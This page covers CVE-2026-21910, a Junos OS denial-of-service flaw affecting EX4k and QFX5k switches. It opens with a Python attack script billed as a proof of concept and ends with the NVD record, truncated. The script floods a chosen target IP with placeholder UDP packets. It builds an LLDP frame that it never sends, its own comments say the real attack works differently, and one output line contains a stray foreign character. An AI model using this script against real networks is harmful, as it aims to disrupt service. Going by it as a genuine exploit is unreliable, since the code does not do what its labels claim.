CVE-2026-21910

#!/usr/bin/env python3 # CVE-2026-21910 PoC - Juniper Junos OS PFE DoS # This PoC simulates interface flapping to trigger the vulnerability # Note: Requires network adjacency to target device import socket import struct import time import sys def send_bpdu_oscillation(target_ip, duration=60): """ Simulate rapid interface state changes to trigger the vulnerability. In real attack, this would involve: 1. Sending crafted LLDP/CDP packets to cause port flapping 2. Sending STP BPDUs to trigger TCN (Topology Change Notification) 3. Exploiting LACP rate changes """ print(f"[*] Starting interface flapping simulation against {target_ip}") print(f"[*] Duration: {duration} seconds") # LLDP frame to trigger port state changes lldp_frame = bytes([ 0x01, 0x80, 0xc2, 0x00, 0x00, 0x0e, # Destination MAC (LLDP multicast) 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # Source MAC 0x88, 0xcc, # LLDP Ethertype # LLDP TLV header (Chassis ID) 0x02, 0x07, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # Port ID TLV 0x04, 0x04, 0x03, 0x00, 0x00, 0x01, # TTL TLV 0x06, 0x02, 0x00, 0x78, # End TLV 0x00, 0x00 ]) start_time = time.time() packet_count = 0 try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Rapidly send packets to simulate flapping while time.time() - start_time < duration: # In real scenario, this would be raw socket L2 injection # For demonstration, using UDP as placeholder sock.sendto(b"FLAP_TRIGGER", (target_ip, 4789)) packet_count += 1 time.sleep(0.01) # 100 packets per second if packet_count % 1000 == 0: print(f"[*] Sent {packet_count} packets...") print(f"[+] Completed. Sent {packet_count} packets in {duration}s") print("[!] Check if VNI间 traffic is dropping on target device") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() def verify_vulnerability(target_ip): """ Verify if the vulnerability is exploitable by checking: 1. Device is Juniper with affected version 2. EVPN-VXLAN is configured 3. LAG exists with multiple paths """ print(f"[*] Checking vulnerability status on {target_ip}") # In real scenario, would check via SNMP/JTI API print("[*] Note: Manual verification required via CLI:") print(" show interfaces extensive | match 'logical'") print(" show evpn database") print(" show vxlan tunnel statistics") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 CVE-2026-21910_poc.py <target_ip> [duration]") sys.exit(1) target = sys.argv[1] duration = int(sys.argv[2]) if len(sys.argv) > 2 else 60 verify_vulnerability(target) send_bpdu_oscillation(target, duration)

{"cve": {"id": "CVE-2026-21910", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:06.920", "lastModified": "2026-02-25T17:17:44.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on EX4k Series and QFX5k Series platforms allows an unauthenticated network-adjacent attacker flapping an interface to cause traffic between VXLAN Network Identifiers (VNIs) to drop, leading to a Denial of Service (DoS).\n\nOn all EX4k and QFX5k platforms, a link flap in an\n\nEVPN-VXLAN configuration Link Aggregation Group (LAG)\nresults in Inter-VNI traffic dropping when there are multiple load-balanced next-hop routes for the same destination.\n\nThis issue is only applicable to systems that support EVPN-VXLAN Virtual Port-Link Aggregation Groups (VPLAG), such as the QFX5110, QFX5120, QFX5200, EX4100, EX4300, EX4400, and EX4650.\n\nService can only be restored by restarting the affected FPC via the 'request chassis fpc restart slot <slot-number>' command.\n\nThis issue affects Junos OS \n\non EX4k and QFX5k Series: \n\n\n\n * all versions before 21.4R3-S12, \n * all versions of 22.2\n * from 22.4 before 22.4R3-S8, \n * from 23.2 before 23.2R2-S5, \n * from 23.4 before 23.4R2-S5, \n * from 24.2 before 24.2R2-S3,\n * from 24.4 before 24.4R2."}, {"lang": "es", "value": "Una vulnerabilidad de comprobación incorrecta de condiciones inusuales o excepcionales en el motor de reenvío de paquetes (PFE) de Juniper Networks Junos OS en plataformas de las series EX4k y QFX5k permite a un atacante no autenticado adyacente a la red que hace fluctuar una interfaz causar la caída del tráfico entre identificadores de red VXLAN (VNI), lo que lleva a una denegación de servicio (DoS).\n\nEn todas las plataformas EX4k y QFX5k, una fluctuación de enlace en un Grupo de Agregación de Enlaces (LAG) con configuración EVPN-VXLAN resulta en la caída del tráfico Inter-VNI cuando hay múltiples rutas de siguiente salto con balanceo de carga para el mismo destino.\n\nEste problema solo es aplicable a sistemas que soportan Grupos de Agregación de Enlaces de Puerto Virtual EVPN-VXLAN (VPLAG), como los QFX5110, QFX5120, QFX5200, EX4100, EX4300, EX4400 y EX4650.\n\nEl servicio solo puede restaurarse reiniciando la FPC afectada mediante el comando 'request chassis fpc restart slot '.\n\nEste problema afecta a Junos OS en las series EX4k y QFX5k:\n\n * todas las versiones anteriores a 21.4R3-S12,\n * todas las versiones de 22.2\n * desde 22.4 anteriores a 22.4R3-S8,\n * desde 23.2 anteriores a 23.2R2-S5,\n * desde 23.4 anteriores a 23.4R2-S5,\n * desde 24.2 anteriores a 24.2R2-S3,\n * desde 24.4 anteriores a 24.4R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:M/U:Green", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"oper ... (truncated)